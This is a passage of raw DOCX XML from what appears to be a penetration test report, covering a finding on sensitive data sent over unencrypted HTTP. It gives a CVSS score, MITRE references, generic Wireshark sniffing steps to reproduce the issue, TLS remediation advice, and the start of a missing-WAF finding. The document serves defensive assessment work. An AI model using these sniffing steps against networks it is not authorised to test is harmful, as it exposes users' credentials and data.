      <w:bookmarkEnd w:id="438294902"/>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719DCAF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3C4F20" w14:textId="72E33B9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7829A4" w14:textId="58E7BB1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915C8F" w14:textId="1B6AC71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F83386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F3853C" w14:textId="15449F5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ADD580E" w14:textId="5F4429BB">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CE92728" w:rsidP="0D325B6E" w:rsidRDefault="0CE92728" w14:paraId="65F101CC" w14:textId="70D5EA65">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0CE92728">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>7.1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B454916" w14:textId="0244D784">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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7191093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967931" w14:textId="2EA961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4F952E84" w14:textId="01B7B738">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C2B2095"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4335" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75D95D8E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="315B3A0F">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9C4E36" w14:textId="6CE7243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1DE510D" w:rsidP="0D325B6E" w:rsidRDefault="01DE510D" w14:paraId="06CD81DE" w14:textId="6726B553">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" r:id="R241fec462ed34a97">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="01DE510D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N</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AC:L</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AT:N</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PR:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="01DE510D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>/UI:P/VC:H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="01DE510D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VI:L</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VA:N</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SC:N</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SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="01DE510D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="01DE510D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4223615E">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2B0F2C" w14:textId="12C83FF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75A5A37" w14:textId="24CCA687">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46A89F4" w:rsidP="0D325B6E" w:rsidRDefault="546A89F4" w14:paraId="07A731F0" w14:textId="2E81EC28">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re10da6e3ea2d4915">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="546A89F4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T0842 - Network Sniffing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="53E506AD">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B5A374F"/>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08C4CA" w14:textId="33809C9D">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0FFEE2F" w:rsidP="0D325B6E" w:rsidRDefault="70FFEE2F" w14:paraId="0F654B7F" w14:textId="26C6B950">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R205138fda9544e3b">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="70FFEE2F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0808 - Encrypt Network Traffic</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3068007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698A00" w14:textId="20665064">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F2AAA00" w14:textId="320A2F2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BB4864B" w14:textId="6A7A5723">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3C16D095" w:rsidP="0D325B6E" w:rsidRDefault="3C16D095" w14:paraId="4B3744CA" w14:textId="257A3DE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99A689A" w:rsidP="0D325B6E" w:rsidRDefault="199A689A" w14:paraId="46B12037" w14:textId="4150B442">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9A689A">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The </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4FFB1BC6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4FFB1BC6">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="199A689A">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0D325B6E" w:rsidR="199A68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87CCE1E">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6A4850AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="087CCE1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> found to be transmitting s</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73845A10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ensitive data over unencrypted HTTP </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traffic, which allows an attacker on the same network to intercept, read, and</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modif</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 xml:space="preserve"> the traffic in transit. If a user enters any login credentials, session tokens, or personal data, it is sent in cleartext and is </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="23E3272F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerable </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25C6BFF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">network </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25C6BFF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sniff</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="22656D32">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="553830D2" w14:textId="09276BBB">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16D095" w:rsidP="0D325B6E" w:rsidRDefault="3C16D095" w14:paraId="5A669FFA" w14:textId="70A6240A">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3C16D09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D72A20E" w:rsidP="0D325B6E" w:rsidRDefault="4D72A20E" w14:paraId="337BD15A" w14:textId="34ECFB12">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D72A20E">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exploit this vulnerability by conducting a man-in-the-middle (MITM) attack, leading to the compromise of user accounts and theft of sensitive </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="17D0451B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>information. This</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="17D0451B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can result in unauthorized access to systems, data breaches, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="17D0451B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>financial loss</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="17D0451B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and damage to APT’s reputation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2450C243" w14:textId="79D49C9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16D095" w:rsidP="0D325B6E" w:rsidRDefault="3C16D095" w14:paraId="0EA06E73" w14:textId="5118930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C16D095" w:rsidP="0D325B6E" w:rsidRDefault="3C16D095" w14:paraId="4568474E" w14:textId="70F29E8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Use </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a network</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 sniffing </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="15F0C9D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tool</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 like Wireshark to capture network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2E89E140" w:rsidP="0D325B6E" w:rsidRDefault="2E89E140" w14:paraId="38A3AC09" w14:textId="0829864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ep 2: Filter the captured traffic for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31038223">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the HTTP</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 protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2E89E140" w:rsidP="0D325B6E" w:rsidRDefault="2E89E140" w14:paraId="09292131" w14:textId="5AA2AC5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Step 3: Interact with the web application and </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2E89E140">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the captured packets to view the sensitive data being transmitted in cleartext.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0EF1EA53" w14:textId="7691EDD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16D095" w:rsidP="0D325B6E" w:rsidRDefault="3C16D095" w14:paraId="0B7DEF67" w14:textId="0A1B587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C16D095" w:rsidP="0D325B6E" w:rsidRDefault="3C16D095" w14:paraId="22AAE678" w14:textId="2F005E97">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C16D09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7D852F0" w:rsidP="0D325B6E" w:rsidRDefault="27D852F0" w14:paraId="2D996AE5" w14:textId="23E7D3C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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7D852F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enforce HTTPS by implementing TLS (Transport Layer Security) across the entire website to encrypt all data transmitted between client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0E1A32" w:rsidP="0D325B6E" w:rsidRDefault="4D0E1A32" w14:paraId="1228292D" w14:textId="3DA22871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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D0E1A32">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Also implement secure cookies by ensuring all session cookies have the “Secure” flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="62980F4E" w14:textId="223C270D">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3C16D095" w:rsidP="0D325B6E" w:rsidRDefault="3C16D095" w14:paraId="0F4A1399" w14:textId="07F0814A">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16D095">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10523228">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53D3BFC9" w:rsidP="0D325B6E" w:rsidRDefault="53D3BFC9" w14:paraId="7E5A4F7C" w14:textId="50507CA3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R20cd8cab6d6d4099">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="53D3BFC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Insufficient Transport Layer Protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5698F639" w14:textId="70FAA79F">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6B8D90BF" w14:textId="455F7CC9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="32475427" w14:textId="29E4DEE2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0BD87FFA" w14:textId="6DF7F71A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4CD6EE1D" w14:textId="5E42B152">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0EF3D64E" w14:textId="40FA2A1A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0B696DB5" w14:textId="796F0793">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3F207D89" w14:textId="75D168D9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5EEDEC44" w14:textId="4B9E0184">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="3B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="009A4207" w14:textId="568E131B">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3B1E6FB9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B1E6FB9">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H1: Lack of Web Application Firewall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1479AD99">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DE9CD2D" w14:textId="5294173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CB25011" w14:textId="70F1761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802C3B" w14:textId="3ACB384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C6BE332">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1F34FD" w14:textId="515BBCE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58C1670" w14:textId="678F04A7">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DF5AA80" w14:textId="4589BB79">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6049B2C" w14:textId="0FEA954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37D9CD60">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45DE674" w14:textId="300243D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6BB78FC" w14:textId="1AB8CF1C">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06B9C487"/>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5FA40F8"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="655721BD">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32A4B0" w14:textId="2FCBD1E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88F1B04" w14:textId="182D1E39">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
